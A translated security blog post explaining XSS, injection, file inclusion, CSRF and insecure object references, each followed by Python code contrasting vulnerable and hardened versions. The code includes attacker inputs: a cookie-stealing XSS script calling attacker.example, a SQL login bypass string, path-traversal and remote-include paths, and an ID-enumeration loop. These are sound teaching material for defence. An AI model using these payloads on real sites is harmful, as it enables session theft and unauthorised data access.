# Vulnerabilities That Websites Commonly Encounter

Source: https://webvocuc.com/blog/nhung-lo-hong-ma-cac-trang-website-gap-phai.html
Published: 2022-10-24 (last modified 2022-10-24)

Vulnerabilities That Websites Commonly Encounter: a saying that circulates in the field goes, "90% of security vulnerabilities originate in web applications, and 90% of administrators have no overall picture of web application security." Whatever the exact figures, that gap between exposure and understanding is one reason the number of attacks on the web keeps growing.

The sections below walk through five of the most common vulnerability classes in web applications, so that you can better understand what securing a web application involves.

## Vulnerabilities That Websites Commonly Encounter

[Image: "Vulnerabilities That Websites Commonly Encounter"]

### Vulnerabilities That Websites Commonly Encounter: XSS (Cross-Site Scripting)

Through an XSS flaw, an attacker can hijack a user's session, deface the page the victim sees, and steal the victim's data from inside the browser. The vulnerability lives in the browser rather than on the server: the application reflects or stores attacker-controlled input and sends it back to other users as part of its own HTML, so the injected script runs with the full privileges of the site's origin.

The attacker inserts JavaScript into a page that has an XSS flaw. When a user visits that page, the attacker's script runs immediately in the victim's browser and can record what the user types, read data the page displays, send requests on the user's behalf, and exfiltrate the session cookie if it is not marked HttpOnly. The root cause is the same in every case: untrusted input written into an HTML, attribute, JavaScript, or URL context without encoding that is correct for that context. Context-aware output encoding is the primary fix; a Content-Security-Policy header and HttpOnly session cookies limit the damage when an encoding is missed.

### Injection flaws

Attackers can exploit weaknesses in how the application builds queries from user input to insert unsafe data, so that the server ends up executing attacker-controlled commands. The same mistake, concatenating untrusted input into a command or query, shows up as SQL injection, shell command injection, LDAP injection, XPath injection, XML injection, and, in native code that copies unchecked input, buffer overflows.

**Consequences:** Some or all of the organisation's important data can be read without authorisation; the attacker can modify or delete it, or hold it for ransom. Among these variants, SQL injection is the one encountered most often in web applications. The standard defence is to keep data and code separate: parameterised queries (prepared statements) for SQL, argument arrays rather than shell strings for commands, and escaping that is correct for each of the other query languages.

### Vulnerabilities That Websites Commonly Encounter: Malicious file inclusion

The most serious risk in this class is remote file inclusion (RFI): when the application builds the path of a file it includes or executes from user-supplied input, the attacker can point it at a file they control, and the server then runs the attacker's code, which is a full compromise of the server. Local file inclusion and path traversal are the same mistake with a local path. PHP applications are the classic victims, because `include` and `require` accept a user-controlled string without complaint, but any code path that opens an XML file, a template, or any other file named by the user is exposed.

### CSRF (Cross-Site Request Forgery)

[Image: "Vulnerabilities That Websites Commonly Encounter"]

One of the most common security vulnerabilities in web applications is CSRF.

CSRF abuses the fact that the browser automatically attaches the session cookie to every request it sends to a site the user is logged in to, including requests triggered from a page the attacker controls. The attacker lures the victim to a page that silently submits a request (a form post, an image load, a script) to the vulnerable site; because the victim's browser attaches the victim's cookies, the site treats the request as a legitimate action by that user.

The result is that the attacker performs actions in the victim's name: changing an email address or password, transferring money, posting content. Unlike XSS, no attacker code has to run on the vulnerable site itself; the malicious page lives elsewhere.

Staying permanently logged in (remember-me sessions) widens the window in which such an attack works, which is why the advice to log out of forums and sites you do not need to stay logged in to has some value. It is only a partial mitigation, though. The fix belongs on the server: a per-session anti-CSRF token that the attacker's page cannot read, SameSite cookies, and checking the Origin header on state-changing requests.

### Insecure direct object references

The latent threat here is that an attacker can take a reference the application hands out (an identifier in a URL, a form field, or a file name) and change it to reach other users' objects without authorisation.

**Example:** user A, logged in as A, changes the account identifier in a request from A's own to B's and is served B's data, effectively acting as B. The application trusted that anyone presenting an identifier was entitled to the object it named. Every reference to an object, file, or database record must be checked against the current user's permissions on each request; using indirect references (per-user handles instead of raw database IDs) and hiding sensitive identifiers reduces the attack surface but does not replace that check.

Administrator functions in particular must be locked down so that an unknown user cannot reach them simply by guessing identifiers. Once an attacker has worked out the structure of the information sent to the server, they can harvest user data, steal credit card details, and more.
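The XSS section above says the fix is encoding that matches the output context. The following added example (not code from the original article) renders the same attacker-supplied comment three ways in Python: pasted straight into HTML, escaped for an HTML text/attribute context, and quoted for an inline `<script>` block. The payload string and the function names are this example's own.

```python
# Added example (not from the original article): one user-supplied comment
# rendered into HTML three ways, to show that encoding must match the
# output context. Only the standard library is used.
import html
import json

# Constructed attacker input: a classic cookie-stealing XSS payload.
PAYLOAD = '<script>fetch("https://attacker.example/?c="+document.cookie)</script>'


def render_vulnerable(comment: str) -> str:
    """String concatenation straight into HTML: the XSS bug the article describes."""
    return f"<div class='comment'>{comment}</div>"


def render_html_context(comment: str) -> str:
    """Correct for text between tags and for quoted attribute values:
    html.escape(quote=True) neutralises < > & " and '."""
    safe = html.escape(comment, quote=True)
    return f"<div class='comment' title='{safe}'>{safe}</div>"


def render_js_context(comment: str) -> str:
    """Correct when the value lands inside an inline <script> block.
    json.dumps produces a valid JavaScript string literal, but it leaves
    '</' alone, and the HTML parser ends a <script> element at the first
    '</script>' regardless of JavaScript quoting, so '</' is escaped too."""
    js_literal = json.dumps(comment).replace("</", "<\\/")
    return f"<script>var comment = {js_literal};</script>"


if __name__ == "__main__":
    print("vulnerable :", render_vulnerable(PAYLOAD))
    print("html ctx   :", render_html_context(PAYLOAD))
    print("js ctx     :", render_js_context(PAYLOAD))
```

Run it and compare the three outputs: only the first contains a live `<script>` tag. A Content-Security-Policy header that disallows inline scripts, and an HttpOnly flag on the session cookie, are the second line of defence for the cases where an encoding is forgotten.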
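For the injection section above, this added example (not from the original article) shows the most common variant, SQL injection, against a constructed in-memory SQLite database: a login query built by string formatting lets `alice' OR 1=1 --` log in without a password, while the same input is harmless to a parameterised query. Table contents and the `login_*` names are this example's own, and passwords are stored in clear only to keep the demo short.

```python
# Added example (not from the original article): login by string-formatted
# SQL versus a parameterised query, on constructed sample data.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data. Real applications store password hashes,
    not clear text; that is left out here to keep the focus on the query."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "correct horse"), ("bob", "battery staple")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """The injection bug: user input is pasted into the SQL text, so a quote
    in the input changes the structure of the query."""
    sql = (
        "SELECT id, username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()


def login_parameterised(conn: sqlite3.Connection, username: str, password: str) -> list:
    """The fix: the SQL text is fixed and the values travel separately as
    parameters, so a quote inside the input is just data."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Constructed attacker input: closes the string literal, adds a tautology,
# and comments out the rest of the WHERE clause (SQLite treats -- as a comment).
INJECTED_USER = "alice' OR 1=1 --"

DB = make_db()

if __name__ == "__main__":
    print("vulnerable, wrong password   :", login_vulnerable(DB, INJECTED_USER, "x"))
    print("parameterised, same input    :", login_parameterised(DB, INJECTED_USER, "x"))
    print("parameterised, real password :", login_parameterised(DB, "alice", "correct horse"))
```

The vulnerable query returns every user in the table, which is the "some or all of the organisation's data" outcome the article warns about; the parameterised query returns nothing for the injected input and exactly one row for the real credentials.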
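The file inclusion section above names PHP's `include` as the classic case. This added example (not from the original article, and Python rather than PHP so it runs offline) models the same `include($_GET['page'])` pattern: one version opens whatever path the user names, which lets `../config.ini` read a secret outside the template directory, and the hardened version allowlists the name and verifies the resolved path before reading. The temporary directory, file names and contents are constructed for the demo; Python's `open()` does not fetch `http://` URLs the way PHP's `include` can with `allow_url_include`, so the remote variant appears only as a rejected input.

```python
# Added example (not from the original article): a page-include helper in
# the style of PHP's include($_GET['page']), once unchecked and once hardened.
import os
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse


def make_template_dir() -> Path:
    """Constructed sample site: two legitimate pages inside templates/ and a
    secret file one level up that must never be served."""
    root = Path(tempfile.mkdtemp(prefix="rfi-demo-"))
    templates = root / "templates"
    templates.mkdir()
    (templates / "home.html").write_text("<h1>Home</h1>")
    (templates / "about.html").write_text("<h1>About</h1>")
    (root / "config.ini").write_text("db_password=hunter2")
    return templates


def include_vulnerable(templates: Path, page: str) -> str:
    """Local file inclusion / path traversal: the user's string is joined
    into the path and opened without any check."""
    with open(os.path.join(templates, page)) as f:
        return f.read()


def include_hardened(templates: Path, page: str) -> str:
    """Defence in depth: accept only a simple allowlisted file name (no URL
    scheme, no separators, no '..'), then verify that the resolved path is
    still a direct child of the template directory before reading it."""
    if urlparse(page).scheme or not re.fullmatch(r"[a-z0-9_-]+\.html", page):
        raise PermissionError(f"rejected page name: {page!r}")
    base = templates.resolve()
    target = (base / page).resolve()
    if target.parent != base:
        raise PermissionError(f"path escapes template dir: {page!r}")
    return target.read_text()


def is_rejected(templates: Path, page: str) -> bool:
    """True if the hardened include refuses this page name."""
    try:
        include_hardened(templates, page)
    except PermissionError:
        return True
    return False


TEMPLATES = make_template_dir()

if __name__ == "__main__":
    print("vulnerable, home      :", include_vulnerable(TEMPLATES, "home.html"))
    print("vulnerable, traversal :", include_vulnerable(TEMPLATES, "../config.ini"))
    print("hardened, home        :", include_hardened(TEMPLATES, "home.html"))
    for bad in ("../config.ini", "http://attacker.example/shell.txt", "home.html/../../config.ini"):
        print("hardened rejects      :", bad, is_rejected(TEMPLATES, bad))
```

The allowlist check alone would be enough here; the resolved-path comparison is kept because it also catches symlinks and encoding tricks that a name pattern does not see.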
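The CSRF section above says the fix belongs on the server: a session-bound token and an Origin check. This added example (not from the original article) models a "change email" endpoint as a plain function over dict-shaped requests, once trusting the session cookie alone and once with both checks. The browser attaches the victim's cookie in both the forged and the legitimate request, which is exactly what the attack relies on. `SECRET`, `SESSIONS`, the site and attacker origins and the function names are this example's own.

```python
# Added example (not from the original article): a state-changing endpoint
# with and without CSRF protection. Requests are dicts standing in for HTTP.
import hashlib
import hmac
import secrets

SECRET = secrets.token_bytes(32)  # server-side key, never sent to clients
SITE_ORIGIN = "https://bank.example"
SESSIONS = {"sess-alice": {"user": "alice", "email": "alice@example.com"}}  # constructed


def csrf_token(session_id: str) -> str:
    """Token bound to the session. The attacker's page cannot compute it
    without SECRET and cannot read it from the victim's page because of
    the same-origin policy, so it cannot include it in a forged form."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def change_email_vulnerable(request: dict) -> str:
    """Trusts the session cookie alone: any cross-site form post succeeds."""
    session = SESSIONS[request["cookies"]["session"]]
    session["email"] = request["form"]["email"]
    return "updated"


def change_email_protected(request: dict) -> str:
    """Rejects requests whose Origin header names another site, then requires
    a token that only the site's own pages can know."""
    session_id = request["cookies"]["session"]
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return "rejected: cross-origin"
    sent = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(sent, csrf_token(session_id)):
        return "rejected: bad token"
    SESSIONS[session_id]["email"] = request["form"]["email"]
    return "updated"


def forged_request(with_origin: bool = True) -> dict:
    """What the browser sends when the logged-in victim visits attacker.example:
    attacker-chosen form fields, the victim's cookie, the attacker's Origin
    (or no Origin at all, which older clients and some redirects produce)."""
    headers = {"Origin": "https://attacker.example"} if with_origin else {}
    return {
        "cookies": {"session": "sess-alice"},
        "headers": headers,
        "form": {"email": "attacker@attacker.example"},
    }


def legitimate_request() -> dict:
    """The same endpoint submitted from the site's own settings page, which
    embedded the token in the form."""
    return {
        "cookies": {"session": "sess-alice"},
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"email": "new@example.com", "csrf_token": csrf_token("sess-alice")},
    }


if __name__ == "__main__":
    print("protected, forged    :", change_email_protected(forged_request()))
    print("protected, no Origin :", change_email_protected(forged_request(with_origin=False)))
    print("protected, legit     :", change_email_protected(legitimate_request()))
    print("vulnerable, forged   :", change_email_vulnerable(forged_request()))
    print("session now          :", SESSIONS["sess-alice"])
```

Note that the token check still runs when Origin is absent, so a missing header does not become a bypass. Marking the session cookie `SameSite=Lax` or `Strict` adds a third layer by stopping the browser from attaching the cookie to cross-site form posts in the first place.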
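The insecure direct object reference section above gives the example of user A reaching B's data by changing an identifier. This added example (not from the original article) shows that in code: an invoice lookup that authenticates but never authorises, the per-request ownership check that fixes it, an enumeration loop of the kind an attacker runs over sequential IDs, and the "indirect reference" idea the section mentions. The invoice table, user names and function names are constructed for the demo.

```python
# Added example (not from the original article): an invoice lookup as the
# IDOR bug and with the ownership check that fixes it.
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Invoice:
    id: int
    owner: str
    amount: int
    card_last4: str


INVOICES = {  # constructed sample data
    1001: Invoice(1001, "alice", 120, "4242"),
    1002: Invoice(1002, "bob", 980, "1881"),
}


class NotFound(Exception):
    pass


def get_invoice_vulnerable(current_user: str, invoice_id: int) -> Invoice:
    """Knows who the caller is but never asks whether the caller may see
    this record: any logged-in user who guesses an id gets it."""
    return INVOICES[invoice_id]


def get_invoice_checked(current_user: str, invoice_id: int) -> Invoice:
    """Authorisation on every request: the object must belong to the caller.
    Missing and foreign ids raise the same error so the endpoint does not
    reveal which ids exist."""
    inv = INVOICES.get(invoice_id)
    if inv is None or inv.owner != current_user:
        raise NotFound(f"invoice {invoice_id} is not available to {current_user}")
    return inv


def enumerate_as(current_user: str, lookup, id_range=range(1000, 1010)) -> list:
    """What an attacker does: walk sequential ids with their own session and
    keep every id that returns a record."""
    found = []
    for invoice_id in id_range:
        try:
            lookup(current_user, invoice_id)
        except (KeyError, NotFound):
            continue
        found.append(invoice_id)
    return found


def indirect_references(current_user: str) -> dict:
    """The 'indirect reference' suggestion: hand the client opaque per-user
    handles instead of raw database ids. It hides the ids, but the ownership
    check in get_invoice_checked is still what stops access."""
    return {
        secrets.token_urlsafe(8): inv.id
        for inv in INVOICES.values()
        if inv.owner == current_user
    }


if __name__ == "__main__":
    print("alice enumerates, vulnerable:", enumerate_as("alice", get_invoice_vulnerable))
    print("alice enumerates, checked   :", enumerate_as("alice", get_invoice_checked))
    print("bob's handles               :", indirect_references("bob"))
```

The enumeration against the vulnerable lookup returns both invoices, including Bob's card digits, while the checked lookup returns only Alice's own.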